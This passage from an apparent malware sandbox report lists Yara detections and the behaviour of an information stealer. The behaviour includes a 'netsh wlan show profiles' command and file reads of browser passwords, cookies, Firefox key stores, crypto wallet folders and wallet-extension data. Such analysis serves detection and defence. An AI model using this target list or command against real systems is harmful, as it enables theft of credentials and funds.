                                Source: Yara matchFile source: 00000025.00000003.2448505563.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.2067162566.0000000000591000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2489688651.0000000000A01000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000003.2360399183.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\NewB[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000150001\NewB.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED
                                Source: Yara match; File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\cred64[1].dll, type: DROPPED
                                Source: Yara match; File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\alexxxxxxxx[1].exe, type: DROPPED
                                Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\1000148001\alexxxxxxxx.exe, type: DROPPED
                                Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp, type: DROPPED
                                Source: Yara match; File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\jok[1].exe, type: DROPPED
                                Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\1000152001\jok.exe, type: DROPPED
                                Source: Yara match; File source: 00000008.00000002.2516925001.0000000007BDD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match; File source: 00000014.00000003.2363329164.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match; File source: 00000008.00000002.2511321549.000000000149E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match; File source: 00000014.00000002.2539684694.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match; File source: 00000014.00000003.2362400081.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match; File source: 00000014.00000002.2539684694.00000000079D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match; File source: 00000014.00000003.2361500183.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match; File source: Process Memory Space: 2531414c80.exe PID: 7556, type: MEMORYSTR
                                Source: Yara match; File source: Process Memory Space: MPGPH131.exe PID: 6188, type: MEMORYSTR
                                Source: Yara match; File source: Process Memory Space: MPGPH131.exe PID: 2584, type: MEMORYSTR
                                Source: Yara match; File source: Process Memory Space: 2531414c80.exe PID: 8848, type: MEMORYSTR
                                Source: Yara match; File source: Process Memory Space: RageMP131.exe PID: 11696, type: MEMORYSTR
                                Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\cgrqKzIZDKj22M18G57j8co.zip, type: DROPPED
                                Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\M5gQOMOo3fGmoJBomt4v2FX.zip, type: DROPPED
                                Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp, type: DROPPED
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\walletsn3<
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: C:\Users\user\AppData\Roaming\Jaxx\Local Storage
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.00000000014F9000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\wallets
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.jsonC
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet
                                Source: 2531414c80.exe, 00000008.00000002.2516925001.0000000007BDD000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                                Source: MPGPH131.exe, 00000013.00000002.2507231203.0000000008422000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\*I#
                                Source: C:\Windows\System32\rundll32.exe; Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                                Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
                                Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                                Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\signons.sqlite
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.json
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
                                Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                                Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqlite
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
                                Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
                                Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
